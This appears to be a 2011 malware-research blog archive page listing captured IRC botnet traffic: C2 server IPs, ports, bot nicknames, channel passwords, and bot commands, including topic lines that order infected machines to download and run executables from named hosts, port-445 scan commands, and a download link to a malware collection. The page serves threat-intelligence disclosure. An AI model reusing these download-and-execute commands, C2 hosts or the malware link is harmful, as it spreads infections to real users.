Month: February 2011

im.updateserver.net 69.72.177.130 Remote Host Port Number 69.72.177.130 1863 PASS google_cache2.tmp NICK n[USA|XP]847980 USER 8479 “” “TsGh” :8479 JOIN #newbin# abc PONG 422 !im http://is.gd/nK9rS1?=IMG-DSC-16-02-2011-JPG !sort infos about hosting: http://whois.domaintools.com/69.72.177.130

Remote Host Port Number 64.32.28.18 6667 NICK [USA|XP|njwfobd] USER vdifkkmdud “” “lol” :vdifkkmdud JOIN #GGGuardian PONG :R00t.Gov infos about hosting: http://whois.domaintools.com/64.32.28.18

im.maximum-irc.info 131.128.57.195 Outgoing connection to remote server: im.maximum-irc.info TCP port 9595 [8:53] … Now talking in #swarm#… [8:53] … Topic On: [ #swarm# ] [ .update http://dickolsthoorn.nl/dn.exe win.exe 1 ] [8:53] … Topic By: [ me ] [8:53] … Modes On: [ #swarm# ] [ +smntMu ] NICK {NEW}[USA][XP]384495 USER svr-2771 “” “svr-” :svr-2771 PONGRead more...

Remote Host Port Number 193.106.173.130 2550 PASS (null) NICK {N}|USA|XP|COMPUTERNAME|624232 USER kanbps “” “vagy” :COMPUTERNAME JOIN #chef PRIVMSG #chef :New Servant. !wget http://r-promofile.info/10039-1.exe infos about hosting: http://whois.domaintools.com/193.106.173.130

Another server from our russian friend snk big hecker Remote Host Port Number 118.144.79.148 5500 194.109.6.97 80 NICK n[USA|XP]0991293 USER x “” “x” 😡 JOIN #xux PONG 422 PONG :srv5500.net * Topic is ‘.usb .msn ALL /125/115/124/115/38/48/62/125/82/118/43/114/98/65/106/108/126/65/127/126/112/104/124/36/66/114/48/124/106/117/102/105/78/44/108/77/106/53/108/99/58/47/43/61/78/107/120/117/112/105/51/67/94/102/44/19/63/56/38/19/36/63/49/56/22/15/105/85/87/’ .msn ALL /125/115/124/115/38/48/62/125/82/118/43/114/98/65/106/108/126/65/127/126/112/104/124/36/66/114/48/124/106/117/102/105/78/44/108/77/106/53/108/99/58/47/43/61/78/107/120/117/112/105/51/67/94/102/44/19/63/56/38/19/36/63/49/56/22/15/105/85/87/ DNS Lookup Host Name IP Address facebook-o.com 118.144.79.148 facebook-t.com 118.144.79.148 x1x4x0.net 127.0.0.1 Outgoing connection toRead more...

DNS Lookup Host Name IP Address finddamaged.org finddamaged.org 86.55.211.249 findcopper.org findcopper.org 91.200.242.17 findvoiceless.org findvoiceless.org 91.200.242.87 Outgoing connection to remote server: finddamaged.org TCP port 80 Outgoing connection to remote server: findvoiceless.org TCP port 80 Outgoing connection to remote server: findcopper.org TCP port 80 Outgoing connection to remote server: findcopper.org TCP port 80 Outgoing connection to remoteRead more...

Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.105] Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.104] Remote Host Port Number 178.211.56.104 81 ircd here 74.206.242.164 80 NICK [N00_USA_XP_3401546]` PRIVMSG [N00_USA_XP_3401 @ :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 10 threads. @ :scan; Random Port Scan started on 174.x.x.x:445 with a delayRead more...

cobain.sdeirc.net DNS_TYPE_A 46.243.8.6 46.243.8.6:4747 Nick: {SwarM}{AUT}{N}405701 Username: 8682 Joined Channel: #CoBaIN with Password GOFK12 infos about hosting: http://whois.domaintools.com/178.211.56.104

another malwares collection around 24 mb here download link: http://e0cc6bdb.theseforums.com

DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.7.2 api.albertoshistory.info 73.189.217.224 205.234.144.207 205.234.144.207 astro.ic.ac.uk 155.198.204.78 ale.pakibili.com 208.73.210.29 versatek.com 74.86.204.212 journalofaccountancy.com 64.154.62.195 transnationale.org 85.31.209.210 mas.0730ip.com 69.43.160.174 stayontime.info 42.247.18.99 www.shearman.com 167.68.29.184 insidehighered.com 69.20.66.11 ate.lacoctelera.net 89.17.206.141 websitetrafficspy.com 178.77.123.35 qun.51.com 114.80.89.36 summer-uni-sw.eesp.ch 193.134.218.137 shopstyle.com 74.201.151.180 xxx.stopklatka.pl unclefed.com 209.50.238.18 mcsp.lvengine.com deirdremccloskey.org 173.236.188.113 journals.lww.com 160.109.108.154 middleastpost.org 74.52.145.82 mas.archivum.info scribbidyscrubs.com 199.89.247.25 mas.mtime.com 59.151.32.20Read more...